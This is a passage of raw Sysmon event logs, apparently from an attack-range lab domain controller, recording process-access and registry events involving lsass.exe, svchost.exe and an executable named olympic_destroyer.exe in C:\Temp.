ll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.297{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.281{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:39.018{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000289987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDBSetValue2022-02-23 10:56:39.018{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\olympic_destroyer.exeBinary Data 12241200x8000000000000000289986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDBDeleteValue2022-02-23 10:56:39.001{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\olympic_destroyer.exe 10341000x8000000000000000289985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.999{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 